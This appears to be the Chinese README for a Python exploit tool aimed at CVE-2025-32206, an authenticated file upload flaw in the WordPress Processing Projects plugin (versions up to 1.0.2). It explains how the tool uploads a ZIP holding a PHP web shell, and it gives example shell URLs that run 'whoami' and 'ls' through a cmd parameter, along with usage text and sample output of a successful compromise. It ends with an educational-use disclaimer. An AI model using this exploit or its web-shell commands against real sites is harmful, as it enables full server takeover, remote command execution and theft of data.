CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H“LABCAT Processing Projects 中存在危险类型文件无限制上传漏洞,攻击者可将 Web Shell 上传至服务器,从而导致完全失陷。”
此 Python 利用脚本针对使用存在漏洞的 Processing Projects 插件(版本 <= 1.0.2)的 WordPress 站点。该插件未能正确处理来自已认证用户的文件上传,允许其上传包含可执行 PHP 代码(Web Shell)的任意 ZIP 文件。
利用脚本:
Nxploit.php)的 ZIP 文件(Nxploited.zip)。http://target.com/wp-content/uploads/processing-projects/Nxploit.phpShell 成功上传后,可通过 cmd 参数执行系统命令。示例:
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls
该 Shell 可执行任意操作系统命令,并直接在响应中返回输出。
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-32206 利用脚本 | 作者:Nxploited (Khaled Alenazi)
options:
-h, --help 显示此帮助信息并退出
-u, --url URL 目标 WordPress URL(例如 http://target.com/wordpress)
-un, --username USERNAME WordPress 管理员用户名
-p, --password PASSWORD WordPress 管理员密码
[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - 任意文件上传
[+] 作者:Nxploited | Khaled Alenazi
[+] 已创建包含 Shell 的 zip 文件:Nxploited.zip -> Nxploit.php
[+] 已成功登录。
[+] 已成功提取表单字段。
[+] 已成功发送上传请求。
[+] Shell 已执行于:http://target.com/wp-content/uploads/processing-projects/Nxploit.php
此脚本仅供教育目的使用。在未拥有或未获得明确测试许可的系统上未经授权使用此利用程序是非法且不道德的。
请始终遵守负责任的披露实践,并仅在受控环境或获得明确授权的情况下使用此工具。
作者:Nxploited | Khaled Alenazi